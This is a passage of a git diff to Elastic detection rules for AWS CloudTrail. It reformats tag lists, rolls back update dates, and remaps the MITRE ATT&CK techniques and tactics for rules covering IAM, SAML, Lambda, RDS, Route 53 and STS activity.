= [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -129,39 +137,22 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml index 3b4349b0ddf..61a70e9d11f 100644 --- a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml +++ b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -129,21 +129,22 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_saml_provider_created.toml b/rules/integrations/aws/persistence_iam_saml_provider_created.toml index 4a5c55f92b2..4cf0be3208c 100644 --- a/rules/integrations/aws/persistence_iam_saml_provider_created.toml +++ b/rules/integrations/aws/persistence_iam_saml_provider_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -94,7 +94,15 @@ references = [ risk_score = 47 rule_id = "a80ffc40-a256-475a-a86a-74361930cdb1" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -108,34 +116,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml index 1f7a7230315..0e89738a87d 100644 --- a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml +++ b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -89,7 +89,15 @@ references = [ risk_score = 47 rule_id = "151d8f72-0747-11ef-a0c2-f661ea17fbcc" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Lambda", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -105,21 +113,17 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml index 215103ed6fa..941d53cbad3 100644 --- a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml +++ b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/27" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -111,7 +111,17 @@ references = [ risk_score = 47 rule_id = "f2015527-7c46-4bb9-80db-051657ddfb69" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Resources: Investigation Guide", "Use Case: Threat Detection"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", +] timestamp_override = "event.ingested" type = "eql" @@ -126,29 +136,36 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_rds_instance_made_public.toml b/rules/integrations/aws/persistence_rds_instance_made_public.toml index d21a1075755..cac81e06dff 100644 --- a/rules/integrations/aws/persistence_rds_instance_made_public.toml +++ b/rules/integrations/aws/persistence_rds_instance_made_public.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -144,29 +144,29 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml index b06ff83c72e..7fefa1edaae 100644 --- a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml +++ b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/10" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic", "Austin Songer"] @@ -104,7 +104,16 @@ references = [ risk_score = 73 rule_id = "12051077-0124-4394-9522-8f4f4db1d674" severity = "high" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Resource Development", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Route 53", + "Use Case: Asset Visibility", + "Tactic: Persistence", + "Tactic: Resource Development", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -118,34 +127,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1584" name = "Compromise Infrastructure" reference = "https://attack.mitre.org/techniques/T1584/" - [[rule.threat.technique.subtechnique]] id = "T1584.001" name = "Domains" reference = "https://attack.mitre.org/techniques/T1584/001/" + + [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml b/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml index fe3fe241355..cabac631f4d 100644 --- a/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml +++ b/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/10" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic", "Austin Songer"] @@ -104,7 +104,16 @@ references = ["https://docs.aws.amazon.com/Route53/latest/APIReference/API_Opera risk_score = 73 rule_id = "2045567e-b0af-444a-8c0b-0b6e2dae9e13" severity = "high" -tags = ["Domain: Cloud", "Tactic: Resource Development", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Route 53", + "Use Case: Asset Visibility", + "Tactic: Persistence", + "Tactic: Resource Development", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -118,21 +127,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1584" name = "Compromise Infrastructure" reference = "https://attack.mitre.org/techniques/T1584/" - [[rule.threat.technique.subtechnique]] id = "T1584.001" name = "Domains" reference = "https://attack.mitre.org/techniques/T1584/001/" + + [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml index 3b9bf00653d..6a09be1c590 100644 --- a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml +++ b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/19" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Austin Songer", "Elastic"] @@ -102,7 +102,16 @@ references = ["https://docs.aws.amazon.com/Route53/latest/APIReference/API_Assoc risk_score = 47 rule_id = "e3c27562-709a-42bd-82f2-3ed926cced19" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Route 53", + "Use Case: Asset Visibility", + "Tactic: Persistence", + "Tactic: Resource Development", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -116,21 +125,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1583" +name = "Acquire Infrastructure" +reference = "https://attack.mitre.org/techniques/T1583/" [[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" +id = "T1583.001" +name = "Domains" +reference = "https://attack.mitre.org/techniques/T1583/001/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_table_created.toml b/rules/integrations/aws/persistence_route_table_created.toml index 1d7f572fb57..fe48343e5ba 100644 --- a/rules/integrations/aws/persistence_route_table_created.toml +++ b/rules/integrations/aws/persistence_route_table_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic", "Austin Songer"] @@ -64,7 +64,15 @@ references = [ risk_score = 21 rule_id = "e12c0318-99b1-44f2-830c-3a38a43207ca" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Network Security Monitoring", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -98,20 +106,11 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" - -[[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml index 51d909014ae..1ada122b033 100644 --- a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml +++ b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/10" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/18" [rule] author = ["Elastic"] @@ -121,54 +121,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" - [[rule.threat.technique.subtechnique]] id = "T1136.003" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1136/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml index d2efba1a208..fefefd67732 100644 --- a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml +++ b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/25" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] @@ -63,7 +63,17 @@ references = [ risk_score = 21 rule_id = "a22f566b-5b23-4412-880d-c6c957acd321" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS STS", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -96,39 +106,49 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.new_terms] field = "new_terms_fields" value = ["user.id", "aws.cloudtrail.flattened.request_parameters.serialNumber"] diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml index 5b219d895c2..7a16cf870c9 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -121,39 +121,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml index 591f18d2a80..87734bebf8d 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -119,39 +119,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml index 066335da0e3..f694877d86f 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -123,29 +123,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml index 25ef1309ea1..628f3841116 100644 --- a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/22" min_stack_comments = "New entity classification fields added: entity.target.id" min_stack_version = "9.2.0" @@ -77,7 +77,15 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachRol risk_score = 21 rule_id = "f6d07a70-9ad0-11ef-954f-f661ea17fbcd" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Resources: Investigation Guide", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", +] timestamp_override = "event.ingested" type = "new_terms" @@ -92,29 +100,22 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.005" +name = "Temporary Elevated Cloud Access" +reference = "https://attack.mitre.org/techniques/T1548/005/" -[[rule.threat]] -framework = 